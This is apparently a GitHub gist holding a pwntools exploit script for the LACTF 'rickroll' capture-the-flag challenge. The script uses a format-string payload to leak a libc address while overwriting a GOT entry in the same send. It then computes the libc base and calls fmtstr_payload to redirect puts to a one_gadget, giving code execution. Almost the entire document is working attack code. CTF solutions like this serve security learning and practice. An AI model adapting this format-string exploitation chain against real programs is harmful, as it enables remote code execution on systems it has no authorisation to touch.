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xct/ Secret

Last active February 11, 2023 15:21
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LACTF rickroll (format string, leak + overwrite at the same time)
from pwn import *
import binascii
context.clear(arch = 'amd64')
context.terminal = ['alacritty', '-e', 'zsh', '-c']
# gdb hack
def _new_binary():
return "gdb-gef"
gdb.binary = _new_binary
base = 0x400000
ret_main = 0x117d
p = remote('',31135, level='debug')
#p = process("./rickroll", level="debug")
libc = ELF("./libc/")
#gdb.attach(p, f'''
#break *{base+0x117d}
# Find Offset
#buf += b"AAAABBBB%6$p"
buf = b""
payload = b"%39$paaa" # leak libc
# %[value]c%[index]$[write_type][padding][address] (\x7d\x11 = 4477)
payload += "%{}c%{}${}{}{}".format(4477-0x11,9,"hn","aaaab","\x18\x40\x40\x00\x00\x00\x00\x00").encode() # iffset required to amount for prefix
buf += payload
leak = p.recv(41)[-12:]
leak = int(leak,16)
print(f"Leak: {hex(leak)}")
base_offset = 0x23D0A
one_gadget = 0xc9620
base = leak - base_offset
print(f"Base: {hex(base)}")
buf = b""
buf += fmtstr_payload(7, {0x404028: base+one_gadget}) # overwrite puts
p.recvuntil("Lyrics: ")
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